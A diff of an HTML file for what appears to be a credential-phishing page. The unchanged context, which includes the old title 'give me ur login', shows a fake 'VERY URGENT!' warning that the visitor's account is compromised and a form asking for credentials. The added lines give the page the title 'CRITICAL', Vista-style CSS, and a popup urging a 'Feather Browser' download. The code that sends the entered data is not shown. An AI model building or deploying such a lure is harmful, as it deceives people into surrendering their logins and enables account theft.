--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html>
     <head>
-        <title>give me ur login</title>
+        <title>CRITICAL</title>
         <style>
             * {
                 font-family: monospace;
@@ -18,9 +18,86 @@
               75% {color: red;}
               100% {color: yellow;}
             }
+            .vista-button {
+              position: relative;
+              background-color: #00ff0d;
+              border: 1px solid #6aa6d6;
+              border-radius: 6px;
+              color: #000;
+              padding: 8px 12px;
+              font-size: 16px;
+              box-shadow: inset 0 1px 0 #ffffffaa, 0 2px 4px rgba(0, 0, 0, 0.3);
+              text-shadow: 0 1px 0 #fff;
+              cursor: pointer;
+              overflow: hidden;
+              transition: background-color 0.1s ease, box-shadow 0.2s ease;
+            }
+
+            .vista-button::before {
+              content: "";
+              position: absolute;
+              top: 0;
+              left: 0;
+              width: 100%;
+              height: 50%;
+              background: rgba(255, 255, 255, 0.2);
+              border-radius: 6px 6px 0 0;
+              pointer-events: none;
+            }
+
+            .vista-button:hover {
+              background-color: #24b145;
+            }
+
+            .vista-button:active {
+              background-color: #0f8200;
+              box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.4);
+            }
+            .vista-container {
+              position: fixed;
+              width: 400px;
+              padding: 10px 30px;
+              background: rgba(255, 255, 255, 0.2);
+              border: 1px solid rgba(255, 255, 255, 0.4);
+              border-radius: 12px;
+              box-shadow:
+                inset 0 1px 0 rgba(255, 255, 255, 0.4),
+                0 4px 20px rgba(0, 0, 0, 0.4);
+              backdrop-filter: blur(12px);
+              -webkit-backdrop-filter: blur(12px);
+              color: #000;
+              animation: move-in .5s ease-in-out;
+              margin-left: 8px;
+              display: none;
+            }
+
+            .vista-container::before {
+              content: "";
+              position: absolute;
+              top: 0;
+              left: 0;
+              width: 100%;
+              height: 100%;
+              border-radius: 12px;
+              background: linear-gradient(to bottom, rgba(255, 255, 255, 0.8), rgba(255,255,255,0));
+              pointer-events: none;
+            }
+            @keyframes move-in {
+              from {transform: translate(0px, -100%); opacity: 0;}
+              to {transform: translate(0px, 0px);}
+            }
+            #huninn {
+              font-family: Rubik;
+              color: white;
+            }
         </style>
     </head>
     <body>
+    <div class="vista-container" id="ad" style="display: block;">
+      <p style="color: black;">Feather Browser is ready!</p>
+      <button class="vista-button" onclick="window.location='https://feather-browser.vercel.app'">Download</button>
+      <button class="vista-button" onclick="closeAd()" style="background: rgb(255, 111, 111);">No Thanks</button>
+    </div>
       <h1 class="warning">VERY URGENT!</h1>
       <h3>Your account has been compromised! Please enter credentials to secure your account!</h3>
         <form id="form">
@@ -80,6 +157,7 @@
                 console.error('Error:', err);
               }
             });
+            setTimeout(() => {document.getElementById("ad").style.display = "block";}, 2000)
         </script>
     </body>
 </html>
